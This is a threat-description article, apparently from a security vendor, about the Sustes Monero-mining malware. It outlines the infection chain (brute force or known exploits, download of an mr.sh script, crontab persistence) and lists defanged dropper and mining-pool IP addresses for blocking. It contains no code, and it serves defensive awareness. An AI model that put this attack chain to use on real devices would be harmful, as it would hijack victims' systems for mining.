Sustes

The Sustes malware's activity was uncovered by cybersecurity researchers recently. After analyzing this threat, experts concluded that this is a miner used for mining the Monero cryptocurrency. The last decade cryptocurrencies' popularity has boomed. Of course, in this, cybercriminals saw an opportunity to profit on the backs of unwitting users. This has been achieved in a variety of ways – by collecting user's cryptocurrency wallets, hijacking their clipboards and pasting their own wallet addresses, and, of course, planting cryptocurrency miners like the Sustes malware on users' systems.

Targets IoT Devices and Linux Servers

The Sustes threat appears to utilize a network scanner for IoT (Internet-of-Things) devices and Linux Servers. Instead of propagating itself like a worm, the Sustes malware is likely using a brute-force attack, which probes for weakly secured accounts that will be an easy target to compromise. The Sustes malware also would attempt to utilize publicly known exploits against said intended targets if the first fails. If either is successful, a widget request is issued to a domain in the attackers' control, and the threat would attempt to pull a shell script file to the victim's device, which shall then be executed. In the case of a successful brute-forcing attempt or utilization of a known exploit, the Sustes malware will download an mr.sh script file. The Sustes threat will scan the infiltrated device for unwanted PIDs (Process IDs of active programs), which will be killed off. It also makes sure to look for active instances of Sustes to assure not interrupting an already compromised device in their net. The same script then assigns various shell variables such as f2 to their dropper site (192[.]99[.]142[.]226:8220), and after assigns f2 with the specific paths for instance `/xm64 (miner executable)` and `wt.conf (configuration file)` which are required to drop further parts later on.

Deploys a Custom Set of Monero Pool Proxies

Next, the script executes the dropped software with a configuration file by issuing several shell commands. A periodic crontab is then executed, which aims to drop and execute itself.

Further analysis on the active Monero pool used by the Sustes threat shows us that the attacker deployed a custom and private set of Monero pool proxies, which make it easier to monitor and block the following addresses:

158[.]69[.]133[.]20 on port 3333
192[.]99[.]142[.]249 on port 3333
202[.]144[.]193[.]110 on port 3333

The Sustes threat filters a wide range of specific IP addresses, which it makes sure to avoid. It is likely that these are IP addresses linked to cybersecurity companies as the attackers would not want their threat to be dissected by experts, or it may be IP addresses connected to big corporations like Amazon, who are well secured and wasting time on trying to exploit them is pointless. This threat will make sure to use up a fair bit of CPU to achieve its own ends and may reduce the lifespan of your device. If the Sustes miner is present on your system, it is advisable to remove it with the help of a reputable anti-malware tool, immediately.